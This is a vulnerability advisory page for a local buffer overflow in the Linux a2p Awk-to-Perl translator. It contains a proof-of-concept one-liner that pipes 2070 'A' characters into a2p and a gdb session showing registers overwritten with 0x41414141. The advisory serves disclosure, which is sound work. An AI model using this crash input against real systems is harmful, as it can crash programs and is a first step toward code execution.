Linux Awk To Perl Translator Buffer Overflow

2018-07-09 / 2018-07-08
Credit: Todor Donev
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

# # # Linux Awk to Perl translator `/usr/bin/a2p` Buffer Overflow (PoC) # # Copyright 2018 (c) Todor Donev <todor.donev at gmail.com> # # # https://ethical-hacker.org/ # https://facebook.com/ethicalhackerorg # # # Disclaimer: # This or previous programs is for Educational # purpose ONLY. Do not use it without permission. # The usual disclaimer applies, especially the # fact that Todor Donev is not liable for any # damages caused by direct or indirect use of the # information or functionality provided by these # programs. The author or any Internet provider # bears NO responsibility for content or misuse # of these programs or any derivatives thereof. # By using these programs you accept the fact # that any damage (dataloss, system crash, # system compromise, etc.) caused by the use # of these programs is not Todor Donev's # responsibility. # # # Use them at your own risk! # # [todor@adamantium ~]$ python -c "print 'A' * 2070" | a2p > /dev/null Segmentation fault [todor@adamantium ~]$ gdb a2p --quiet Reading symbols from /usr/bin/a2p...(no debugging symbols found)...done. Missing separate debuginfos, use: debuginfo-install *SNIPED* (gdb) r bof Starting program: /usr/bin/a2p bof [Thread debugging using libthread_db enabled] Program received signal SIGSEGV, Segmentation fault. 0x0074ee65 in fgets () from /lib/libc.so.6 (gdb) info reg eax 0x1060 4192 ecx 0x1 1 edx 0x41414141 1094795585 ebx 0x880ff4 8916980 esp 0xbffff0f0 0xbffff0f0 ebp 0xbffff118 0xbffff118 esi 0x41414141 1094795585 edi 0x8062920 134621472 eip 0x74ee65 0x74ee65 <fgets+53> eflags 0x210216 [ PF AF IF RF ID ] cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51 (gdb)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top